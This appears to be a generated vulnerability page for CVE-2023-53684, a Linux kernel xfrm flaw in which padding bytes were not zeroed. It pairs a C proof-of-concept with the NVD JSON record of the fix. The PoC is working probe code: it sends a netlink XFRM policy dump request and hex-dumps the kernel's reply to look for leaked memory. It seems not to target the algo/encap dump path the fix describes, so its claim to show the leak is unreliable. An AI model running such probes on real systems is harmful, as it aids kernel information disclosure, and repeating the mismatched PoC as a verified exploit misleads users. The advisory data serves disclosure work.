CVE-2023-53684

/* CVE-2023-53684 - Linux Kernel xfrm padding information disclosure PoC * This PoC demonstrates how to trigger the xfrm algo/encap dump operation * to read uninitialized padding bytes from kernel structures. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/xfrm.h> #define NETLINK_XFRM 6 int main(int argc, char *argv[]) { int nlfd; struct sockaddr_nl sa; struct { struct nlmsghdr nh; struct xfrm_userpolicy_info xpinfo; } req; char buf[4096]; struct nlmsghdr *nlh; int len; // Create netlink socket for XFRM nlfd = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (nlfd < 0) { perror("socket"); return 1; } memset(&sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; if (bind(nlfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); close(nlfd); return 1; } // Send XFRM_MSG_GETPOLICY to trigger dump of algo/encap structures memset(&req, 0, sizeof(req)); req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_userpolicy_info)); req.nh.nlmsg_type = XFRM_MSG_GETPOLICY; req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP; req.nh.nlmsg_seq = 1; req.nh.nlmsg_pid = getpid(); if (send(nlfd, &req, req.nh.nlmsg_len, 0) < 0) { perror("send"); close(nlfd); return 1; } // Receive response and inspect padding bytes len = recv(nlfd, buf, sizeof(buf), 0); if (len > 0) { // Analyze received data for leaked padding content nlh = (struct nlmsghdr *)buf; printf("Received %d bytes from kernel\n", len); printf("Message type: %d\n", nlh->nlmsg_type); // Dump raw hex to inspect potential leaked padding unsigned char *p = (unsigned char *)buf; for (int i = 0; i < len && i < 256; i++) { if (i % 16 == 0) printf("\n%04x: ", i); printf("%02x ", p[i]); } printf("\n"); } close(nlfd); return 0; }

{"cve": {"id": "CVE-2023-53684", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:52.653", "lastModified": "2026-02-26T23:10:01.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: Zero padding when dumping algos and encap\n\nWhen copying data to user-space we should ensure that only valid\ndata is copied over. Padding in structures may be filled with\nrandom (possibly sensitve) data and should never be given directly\nto user-space.\n\nThis patch fixes the copying of xfrm algorithms and the encap\ntemplate in xfrm_user so that padding is zeroed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.106", "matchCriteriaId": "46A62903-B927-42D9-88F8-7F39EC9BC23B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.23", "matchCriteriaId": "C6396026-EF6B-4933-AF27-B3AFE6E5506D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.10", "matchCriteriaId": "5178A008-E2D6-4093-BCD4-8A80523EE39E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0725daaa9a879388ed312110f62dbd5ea2d75f8f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1a351e26cc010d6991fbbd5701ac16581372e26f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5218af4ad5d8948faac19f71583bcd786c3852df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8222d5910dae08213b6d9d4bc9a7f8502855e624", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}